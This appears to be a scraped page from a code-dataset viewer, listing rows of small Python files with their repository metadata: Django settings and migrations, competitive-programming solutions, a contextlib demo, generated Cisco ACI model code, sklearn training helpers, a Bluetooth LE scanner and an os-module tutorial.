# from an environment variable before deploying.
SECRET_KEY = 'd56v)@7t(80-417mdh)+3++!d5hd($la5m$w*b4xum9vjfnx)u'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Project app (models + DRF serializers/views).
    'Rapp_3_ModelClass.apps.Rapp3ModelclassConfig',
    'rest_framework',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'rest_api_3_product.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level templates directory in addition to per-app templates.
        'DIRS': [os.path.join(BASE_DIR, 'templates')]
        ,
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'rest_api_3_product.wsgi.application'

# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
b03de72493e2c78c1000ad28f82b270dba2b5ebb
|
f13acd0d707ea9ab0d2f2f010717b35adcee142f
|
/Others/soundhound/soundhound2018-summer-qual/c.py
|
b42363ae9f79c07d25224a6872610f1bc11e50c0
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
KATO-Hiro/AtCoder
|
126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7
|
bf43320bc1af606bfbd23c610b3432cddd1806b9
|
refs/heads/master
| 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 |
CC0-1.0
| 2023-09-14T21:59:38 | 2018-02-11T00:32:45 |
Python
|
UTF-8
|
Python
| false | false | 797 |
py
|
# -*- coding: utf-8 -*-
def main():
    """SoundHound 2018 summer qualifier, problem C.

    Reads n, m, d and prints the expected number of adjacent index pairs
    whose values differ by exactly d, in a uniformly random length-m
    sequence over 1..n.
    """
    n, m, d = map(int, input().split())

    # Key insight: linearity of expectation over the m - 1 adjacent pairs.
    # See:
    # https://img.atcoder.jp/soundhound2018-summer-qual/editorial.pdf
    # https://mathtrain.jp/expectation
    # Split on d == 0 and count the ordered value pairs with difference d.
    ans = m - 1

    if d == 0:
        # d = 0: pairs (1, 1), ..., (n, n) -> n of n^2, i.e. probability 1/n.
        ans /= n
    else:
        # d != 0: (1, d+1), ..., (n-d, n) plus the mirrored pairs
        # -> 2 * (n - d) of n^2.
        ans *= 2 * (n - d)
        ans /= n ** 2

    print(ans)


if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
579b09ba8c6ea43f5b254fc7bfcff355538a029b
|
aa369073fab4f8e13ac27a714fe0d975a5a4a9ed
|
/algorithms/contextlib/contextlib_decorator.py
|
e31081404750566ee6b97aecadeb90d4fa43ebe0
|
[] |
no_license
|
ramsayleung/python3-module-of-week
|
4076599a8b1d8aa5794de5d73e2083555abe9f0c
|
54266c7e62025c3816a6987191c40f3bc0fdd97c
|
refs/heads/master
| 2021-06-18T09:07:30.256614 | 2017-06-25T10:14:54 | 2017-06-25T10:14:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 583 |
py
|
import contextlib
class Context(contextlib.ContextDecorator):
    """Tracing context manager that can also be applied as a decorator.

    Each lifecycle hook prints its own name together with the label passed
    at construction time.
    """

    def __init__(self, how_used):
        self.how_used = how_used
        message = '__init__({})'.format(how_used)
        print(message)

    def __enter__(self):
        # Announce entry, then hand the manager itself to any `as` target.
        message = '__enter__({})'.format(self.how_used)
        print(message)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Implicit None return: exceptions from the managed block propagate.
        message = '__exit__({})'.format(self.how_used)
        print(message)
@Context('as decorator')
def func(message):
    """Wrapped by Context: each call is bracketed by __enter__/__exit__."""
    print(message)


print()

# Classic usage: explicit with-statement around a block of work.
with Context('as context manager'):
    print('Doing work in the context')
print()

# Decorator usage: calling func() re-enters the same Context instance.
func('Doing work in the wrapped function')
|
[
"[email protected]"
] | |
234dd1f7bc842aa839543c69dc1229e4cbfc4ef0
|
299e2c985b4a2921b150579955e7c60eee094397
|
/news/migrations/0006_auto_20190628_1447.py
|
9bd54a81c13dcf49ebf7819d2ee21928410fb2e4
|
[
"MIT"
] |
permissive
|
Nigar-mr/News
|
48d58fbaab0f2bb8cc717323449d7eba14b94918
|
b75b78cc9fa64259f4239b1d456daa5224040ce4
|
refs/heads/master
| 2020-06-17T15:20:05.411391 | 2019-07-09T08:21:24 | 2019-07-09T08:21:24 | 195,961,863 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 407 |
py
|
# Generated by Django 2.2.2 on 2019-06-28 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
    # Points HeaderModel.image uploads at the news/icons/ directory.

    dependencies = [
        ('news', '0005_remove_headermodel_dropdown'),
    ]

    operations = [
        migrations.AlterField(
            model_name='headermodel',
            name='image',
            field=models.ImageField(upload_to='news/icons/'),
        ),
    ]
|
[
"[email protected]"
] | |
4be510286a64309365e96715a1c1baddce168127
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/comp/accessp.py
|
6214ab713e8f774ee7c5499f70f913487eac8f0d
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 |
Python
|
UTF-8
|
Python
| false | false | 5,062 |
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AccessP(Mo):
    """Generated ACI model: abstract Access Profile (compAccessP).

    Code-generated by the cobra toolchain ("do not modify"); only comments
    have been added here.
    """

    meta = ClassMeta("cobra.model.comp.AccessP")

    meta.isAbstract = True
    meta.moClassName = "compAccessP"
    # NOTE(review): duplicated assignment kept as emitted by the generator.
    meta.moClassName = "compAccessP"
    meta.rnFormat = ""
    meta.category = MoCategory.REGULAR
    meta.label = "Abstraction of Access Profile"
    meta.writeAccessMask = 0x11
    meta.readAccessMask = 0x11
    meta.isDomainable = False
    meta.isReadOnly = False
    meta.isConfigurable = True
    meta.isDeletable = True
    meta.isContextRoot = False

    meta.childClasses.add("cobra.model.fault.Delegate")

    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))

    meta.parentClasses.add("cobra.model.vmm.DomP")

    meta.superClasses.add("cobra.model.naming.NamedObject")
    meta.superClasses.add("cobra.model.pol.Obj")
    meta.superClasses.add("cobra.model.pol.Def")

    meta.concreteSubClasses.add("cobra.model.vmm.UsrAccP")

    meta.rnPrefixes = [
    ]

    # Property metadata: one PropMeta per model attribute.
    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)

    prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
    prop.label = "Description"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("descr", prop)

    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)

    prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
    prop.label = "Name"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9_.:-]+']
    meta.props.add("name", prop)

    prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
    prop.label = "Name alias"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 63)]
    prop.regex = ['[a-zA-Z0-9_.-]+']
    meta.props.add("nameAlias", prop)

    prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerKey", prop)

    prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerTag", prop)

    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)

    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)

    # Deployment Meta
    meta.deploymentQuery = True
    meta.deploymentType = "Ancestor"
    meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmOrchsProvPlan", "Provider Plans", "cobra.model.vmm.OrchsProvPlan"))
    meta.deploymentQueryPaths.append(DeploymentPathMeta("ADomPToEthIf", "Interface", "cobra.model.l1.EthIf"))
    meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
    meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmEpPD", "Portgroups", "cobra.model.vmm.EpPD"))

    def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
        # rnFormat is empty, so no naming values are required.
        namingVals = []
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"[email protected]"
] | |
9e03554339fbf11a977d749579273a5308ebe17c
|
0ba1743e9f865a023f72a14d3a5c16b99ee7f138
|
/problems/test_0413_dp.py
|
b94b4a4005613d47a4b97b5eda809a2ed0f42f15
|
[
"Unlicense"
] |
permissive
|
chrisxue815/leetcode_python
|
d0a38a4168243b0628256825581a6df1b673855c
|
a33eb7b833f6998972e5340d383443f3a2ee64e3
|
refs/heads/main
| 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 997 |
py
|
import unittest
import utils
# O(n) time. O(1) space. DP on the length of the current arithmetic run.
class Solution:
    def numberOfArithmeticSlices(self, a):
        """
        :type a: List[int]
        :rtype: int

        Counts contiguous slices of length >= 3 that form an arithmetic
        progression. `run` is the number of arithmetic slices ending at the
        current index; while the common difference persists it grows by one
        per step, and each value of `run` is added to the total. This
        replaces the original O(n^2)-pairs DP with the standard linear scan
        producing identical results.
        """
        result = 0
        run = 0
        for i in range(2, len(a)):
            if a[i] - a[i - 1] == a[i - 1] - a[i - 2]:
                run += 1
                result += run
            else:
                # Difference broke: no arithmetic slice ends here.
                run = 0
        return result
class Test(unittest.TestCase):
    def test(self):
        """Data-driven check: cases are loaded from the JSON file next to this test."""
        cases = utils.load_test_json(__file__).test_cases
        for case in cases:
            args = str(case.args)
            actual = Solution().numberOfArithmeticSlices(**case.args.__dict__)
            self.assertEqual(case.expected, actual, msg=args)


if __name__ == '__main__':
    unittest.main()
|
[
"[email protected]"
] | |
15779835a64dfa759bd9410bf9661ec5cf78f3aa
|
9a1538123b8abec14410dad46c437cf735684dd9
|
/product/migrations/0018_productproperty_value_type.py
|
48a0a691e24e11ea5cedf4a2158c7c000f223fd6
|
[] |
no_license
|
asmuratbek/zastroy24
|
deec6bd65229aeb29eb313d915c6c47ca036a8aa
|
d68ce21beefc644752a1271a4d8981cd2423afba
|
refs/heads/master
| 2020-04-27T18:44:26.845151 | 2019-03-08T18:09:13 | 2019-03-08T18:09:13 | 174,585,168 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-24 09:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds ProductProperty.value_type (unit of measurement, e.g. "kg");
    # help_text/verbose_name are Cyrillic, stored as unicode escapes.

    dependencies = [
        ('product', '0017_auto_20171224_1536'),
    ]

    operations = [
        migrations.AddField(
            model_name='productproperty',
            name='value_type',
            field=models.CharField(help_text='\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0433', max_length=255, null=True, verbose_name='\u0415\u0434\u0438\u043d\u0438\u0446\u0430 \u0438\u0437\u043c\u0435\u0440\u0435\u043d\u0438\u044f'),
        ),
    ]
|
[
"[email protected]"
] | |
7ea4348e0388b427adcc0d1d2c31b06df0550e19
|
023acc1445ebde3e9fe4318fcfd60908c91d74d5
|
/sli/train.py
|
77fdce51b077a71a4dc73a1c298f924c963fc9d0
|
[] |
no_license
|
counterfactuals/sensible-local-interpretations
|
99d22df59a6f07b6135762eec57c29e80dac9cdf
|
ab7af07299ea2ec1a1be28e0bf38f4947321d04c
|
refs/heads/master
| 2022-03-12T11:30:19.296104 | 2019-12-02T20:31:27 | 2019-12-02T20:31:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,828 |
py
|
from copy import deepcopy
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, GradientBoostingClassifier
from sklearn.tree import export_graphviz, DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.tree import plot_tree
from sampling import resample
def train_models(X: np.ndarray, y: np.ndarray,
                 class_weights: list=[0.5, 1.0, 2.0], model_type: str='logistic'):
    '''Train one binary classifier per positive-class weight.

    Params
    ------
    X, y
        Training data; y must contain exactly two classes.
    class_weights
        Weights to weight the positive class, one for each model to be trained
    model_type
        One of 'logistic', 'mlp2', 'rf', 'gb'.

    Returns
    -------
    list
        Fitted sklearn estimators, one per entry in class_weights.
    '''
    assert np.unique(y).size == 2, 'Task must be binary classification!'
    models = []
    for class_weight in class_weights:
        # BUG FIX: the original rebound X/y when resampling, so every later
        # class_weight trained on already-resampled data. Use per-iteration
        # names so each model resamples from the original dataset.
        X_fit, y_fit = X, y
        if model_type == 'logistic':
            m = LogisticRegression(solver='lbfgs', class_weight={0: 1, 1: class_weight})
        elif model_type == 'mlp2':
            # MLP has no class_weight parameter, so weight via oversampling.
            m = MLPClassifier()
            X_fit, y_fit = resample(X, y, sample_type='over', class_weight=class_weight)
        elif model_type == 'rf':
            m = RandomForestClassifier(class_weight={0: 1, 1: class_weight})
        elif model_type == 'gb':
            # Gradient boosting likewise weights via oversampling.
            m = GradientBoostingClassifier()
            X_fit, y_fit = resample(X, y, sample_type='over', class_weight=class_weight)
        m.fit(X_fit, y_fit)
        models.append(deepcopy(m))
    return models
def regress(X: np.ndarray, y: np.ndarray, model_type: str='linear'):
    '''Fit and return a single regressor of the requested type.

    Params
    ------
    X, y
        Training data.
    model_type
        One of 'linear', 'mlp2', 'rf', 'gb'.
    '''
    if model_type == 'linear':
        m = LinearRegression()
    elif model_type == 'mlp2':
        m = MLPRegressor()
    elif model_type == 'rf':
        m = RandomForestRegressor()
    elif model_type == 'gb':
        # BUG FIX: GradientBoostingRegressor was never imported at module
        # level (only the classifier is), so model_type='gb' raised NameError.
        from sklearn.ensemble import GradientBoostingRegressor
        m = GradientBoostingRegressor()
    m.fit(X, y)
    return m
|
[
"[email protected]"
] | |
cc2b9367dcb75a3613b7456a24d7379ffed94e1f
|
23daf97312ea16cc399feedfa048131d564b83fa
|
/lib/BluenetLib/lib/core/bluetooth_delegates/AioScanner.py
|
1bdc096e712664a077ca209d4d5155cfeaf19041
|
[] |
no_license
|
wickyb94/programmer
|
6e2cafa3fbb9f54bfdcd24f7062f6425ebb429fc
|
be0f01586365a79b51af8c4da376fe216d38afba
|
refs/heads/master
| 2022-04-09T17:52:18.106331 | 2020-03-02T15:57:02 | 2020-03-02T15:57:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,569 |
py
|
import asyncio
import sys
import time
import aioblescan
from BluenetLib.lib.util.LogUtil import tfs
counter = 0
prev = time.time()
start = time.time()
class AioScanner:
    """BLE advertisement scanner built on aioblescan and a raw HCI socket.

    Creates a fresh event loop per scan attempt, sends the HCI scan request,
    and forwards decoded advertisement events to an optional delegate.
    """

    def __init__(self, hciIndex = 0):
        self.event_loop = None
        self.bluetoothControl = None
        self.connection = None
        self.timeRequestStart = 0
        # Set once the first advertisement report arrives (scan is working).
        self.eventReceived = False
        self.hciIndex = hciIndex
        self.delegate = None
        self.scanRunning = False
        self.scanDuration = 0

    def withDelegate(self, delegate):
        # Fluent setter; delegate.handleDiscovery(event) is invoked per advertisement.
        self.delegate = delegate
        return self

    def start(self, duration):
        """Run a (blocking) scan for `duration` seconds."""
        self.scanRunning = True
        self.scanDuration = duration
        self.scan()

    def stop(self):
        # Flag polled by awaitActiveSleep; ends the scan loop early.
        self.scanRunning = False

    def scan(self, attempt = 0):
        """One scan attempt; retries up to 10 times if no event arrives within 1s."""
        print(tfs(), "Attempt Scanning")
        self.eventReceived = False
        event_loop = asyncio.new_event_loop()
        bluetoothSocket = aioblescan.create_bt_socket(self.hciIndex)
        # NOTE(review): uses the loop's private _create_connection_transport.
        transportProcess = event_loop._create_connection_transport(bluetoothSocket, aioblescan.BLEScanRequester, None, None)
        self.connection, self.bluetoothControl = event_loop.run_until_complete(transportProcess)
        print(tfs(), "Connection made!")
        self.bluetoothControl.process = self.parsingProcess
        self.timeRequestStart = time.time()
        self.bluetoothControl.send_scan_request()
        print(tfs(), "Scan command sent!")
        alreadyCleanedUp = False
        try:
            # Wait up to 1s for the first advertisement; retry on silence.
            event_loop.run_until_complete(self.awaitEventSleep(1))
            if not self.eventReceived:
                if attempt < 10:
                    print(tfs(), 'Retrying... Closing event loop', attempt)
                    self.cleanup(event_loop)
                    alreadyCleanedUp = True
                    self.scan(attempt + 1)
                    return
                else:
                    pass
            event_loop.run_until_complete(self.awaitActiveSleep(self.scanDuration))
        except KeyboardInterrupt:
            print('keyboard interrupt')
        finally:
            print("")
            if not alreadyCleanedUp:
                print(tfs(), 'closing event loop', attempt)
                self.cleanup(event_loop)

    async def awaitEventSleep(self, duration):
        # Poll every 50ms until an event arrives or the timeout elapses.
        while self.eventReceived == False and duration > 0:
            await asyncio.sleep(0.05)
            duration -= 0.05

    async def awaitActiveSleep(self, duration):
        # Poll every 50ms until stop() is called or the scan duration elapses.
        while self.scanRunning == True and duration > 0:
            await asyncio.sleep(0.05)
            duration -= 0.05

    def cleanup(self, event_loop):
        """Stop scanning, close the transport and the event loop."""
        print(tfs(), "Cleaning up")
        self.bluetoothControl.stop_scan_request()
        self.connection.close()
        event_loop.close()

    def parsingProcess(self, data):
        # Raw HCI packet callback: decode, then notify the delegate if the
        # packet contained at least one advertisement report.
        ev=aioblescan.HCI_Event()
        xx=ev.decode(data)
        hasAdvertisement = self.dataParser(ev)
        if hasAdvertisement and self.delegate is not None:
            self.delegate.handleDiscovery(ev)

    def dataParser(self, data):
        #parse Data required for the scanner
        # Recursively walks the decoded payload; returns True if an
        # HCI_LEM_Adv_Report was found anywhere in it.
        advertisementReceived = False
        for d in data.payload:
            if isinstance(d, aioblescan.aioblescan.HCI_CC_Event):
                self.checkHCI_CC_EVENT(d)
            elif isinstance(d, aioblescan.Adv_Data):
                advertisementReceived = self.dataParser(d) or advertisementReceived
            elif isinstance(d, aioblescan.HCI_LE_Meta_Event):
                advertisementReceived = self.dataParser(d) or advertisementReceived
            elif isinstance(d, aioblescan.aioblescan.HCI_LEM_Adv_Report):
                self.eventReceived = True
                advertisementReceived = True
        return advertisementReceived

    def checkHCI_CC_EVENT(self, event):
        # Log which HCI command a Command Complete event acknowledges.
        for d in event.payload:
            if isinstance(d, aioblescan.aioblescan.OgfOcf):
                if d.ocf == b'\x0b':
                    print(tfs(),"Settings received")
                elif d.ocf == b'\x0c':
                    print(tfs(), "Scan command received")
            # if isinstance(d, aioblescan.aioblescan.Itself):
            #     print("byte", d.name)
            # if isinstance(d, aioblescan.aioblescan.UIntByte):
            #     print("UIntByte", d.val)

    def parseAdvertisement(self, decodedHciEvent):
        # Progress indicator: prints a dot per advertisement, wrapping the
        # line every 50 dots via the module-level `counter`.
        global counter
        if counter % 50 == 0:
            counter = 0
            print(".")
        else:
            sys.stdout.write(".")
        counter+= 1
        # decodedHciEvent.show()
|
[
"[email protected]"
] | |
96fd2bd857643c663092d384cf8ec78d6b61a6cf
|
fb0f6646b2a7972454453907fbdc656b7471f55f
|
/p322_module_os.py
|
dd9437674eb42016e5d93c9c80fd0ac56ab764e7
|
[] |
no_license
|
woojin97318/python_basic
|
6497d5c85369746edfe8ca79ad7f3f47c871ee66
|
97e9a322a08f1483bf35dc03507ac36af2bf1ddb
|
refs/heads/master
| 2023-07-15T03:06:05.716623 | 2021-08-25T03:46:48 | 2021-08-25T03:46:48 | 399,681,125 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 619 |
py
|
# Load the os module.
import os

# Print a few basic pieces of environment information.
print("ํ์ฌ ์ด์์ฒด์ :", os.name)
print("ํ์ฌ ํด๋:", os.getcwd())
print("ํ์ฌ ํด๋ ๋ด๋ถ์ ์์:", os.listdir())

# Create a folder, then remove it (rmdir only works on an empty folder).
os.mkdir("hello")
os.rmdir("hello")

# Create a file, then rename it.
with open("original.txt", "w") as file:
    file.write("hello")
os.rename("original.txt", "new.txt")

# Remove the file.
os.remove("new.txt")
# os.unlink("new.txt")

# Run a shell command.
os.system("dir")
|
[
"[email protected]"
] | |
44b780296f882a1446213f64764a325db1448200
|
850001831b1fcdd4d27e328b356fc34909ca2917
|
/examples/spawn.py
|
367e288dfa2b65a8b6bb4a47c0514b8b5cd14e4f
|
[
"BSD-3-Clause"
] |
permissive
|
yidiq7/pathos
|
b337353ccfe447866c46a4a784a7908c2f3fe31e
|
7e4fef911dc0283e245189df4683eea65bfd90f0
|
refs/heads/master
| 2022-08-24T08:43:34.009115 | 2020-05-27T12:18:21 | 2020-05-27T12:18:21 | 267,310,390 | 0 | 0 |
NOASSERTION
| 2020-05-27T12:14:50 | 2020-05-27T12:14:47 | null |
UTF-8
|
Python
| false | false | 957 |
py
|
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2020 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/pathos/blob/master/LICENSE
"""
demonstrate pathos's spawn2 function
"""
from __future__ import print_function
from pathos.util import spawn2, _b, _str
if __name__ == '__main__':
    import os

    def onParent(pid, fromchild, tochild):
        # Parent side: read the child's greeting, send a reply, then reap
        # the child process with os.wait().
        s = _str(fromchild.readline())
        print(s, end='')
        tochild.write(_b('hello son\n'))
        tochild.flush()
        os.wait()

    def onChild(pid, fromparent, toparent):
        # Child side: greet the parent, read the reply, then exit
        # immediately without running cleanup handlers.
        toparent.write(_b('hello dad\n'))
        toparent.flush()
        s = _str(fromparent.readline())
        print(s, end='')
        os._exit(0)

    # Fork and wire up the two pipe endpoints to the callbacks above.
    spawn2(onParent, onChild)
# End of file
|
[
"mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df"
] |
mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df
|
daa82ba337e7c7ea48f602e231247e8415e0c3dc
|
805fbd9aead4fc2998fd5d8790043a20b2656915
|
/data_format/__init__.py
|
cb3c33b9d09bcf03a38af8f8bdd84bd066689fa1
|
[] |
no_license
|
chenhaomingbob/ToolBox
|
f9a6ef64352c85ae84c44e9fab53aab74992c7c5
|
962304c004aa39e8a5bcb153def9dc3895595c9f
|
refs/heads/master
| 2021-05-19T00:37:23.170766 | 2020-06-01T10:57:05 | 2020-06-01T10:57:05 | 251,496,830 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 145 |
py
|
#!/usr/bin/python
# -*- coding:utf8 -*-
"""
Author: Haoming Chen
E-mail: [email protected]
Time: 2020/03/23
Description:
"""
|
[
"[email protected]"
] | |
d3743b3de00d52481bf2c74a20fb31405afce4c4
|
fb81442e5d2e940ad967bd0a264b7918d739173f
|
/py_test.py
|
49e8b365b34d93965925230a57e83abad11d1008
|
[] |
no_license
|
Amertz08/euler_py
|
054f45d110b8cf4d0e9afeb7f5c608026226443c
|
0dd217c9e0a061e3622fd150b61e24a2c6bad5af
|
refs/heads/master
| 2021-05-06T23:15:42.742578 | 2017-12-07T00:16:31 | 2017-12-07T00:16:31 | 112,960,695 | 0 | 1 | null | 2017-12-06T20:32:57 | 2017-12-03T20:21:48 |
C
|
UTF-8
|
Python
| false | false | 515 |
py
|
import euler_py as eul
def test_problem_one():
    # Project Euler #1: sum of multiples of 3 or 5 below 10.
    result = eul.problem_one(10)
    assert result == 23, f'Problem 1 should be 23: {result}'


def test_problem_two():
    # Project Euler #2: sum of even Fibonacci numbers up to 89.
    result = eul.problem_two(89)
    assert result == 44, f'Problem 2 should be 44: {result}'


def test_problem_three():
    # Project Euler #3: largest prime factor of 13195.
    result = eul.problem_three(13195)
    assert result == 29, f'Problem 3 should be 29: {result}'


def test_problem_four():
    # Project Euler #4: largest palindrome product of two 2-digit numbers.
    result = eul.problem_four(2)
    assert result == 9009, f'Problem 4 should be 9009: {result}'
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.